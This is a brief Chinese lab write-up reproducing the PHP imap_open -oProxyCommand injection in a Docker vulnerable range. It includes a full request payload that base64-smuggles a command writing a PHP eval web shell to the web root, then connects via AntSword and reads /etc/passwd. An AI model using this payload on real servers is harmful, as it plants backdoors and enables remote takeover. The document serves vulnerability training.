一、靶场的启动
在相应的文件夹位置打开终端后进行如下操作
1.运行此靶场
sudo docker-compose up -d
2.查看启动环境
sudo docker ps
3.关闭此靶场环境
docker-compose down
二、漏洞内容简介
php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令
debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等
ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
ProxyCommand用来指定连接到服务器的命令. 其可以是任何的命令,只要能从其标准输入读入数据,然后写出到标准输出即可. 这条命令需要连接到sshd服务器上
访问页面
三、漏洞复现
bp抓包后进行修改
%09后面与|前面为要执行命令的base64
远程执行的rec代码是
echo '<?php eval($_POST[1]);' > /var/www/html/e.php
写入一句话木马到e.php文件下即网页当前目录下
Base64:
ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sL2UucGhw
Payload=
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sL2UucGhw|base64%09-d|sh}a&username=222&password=333
蚁剑链接
查看/etc/passwd也有权限
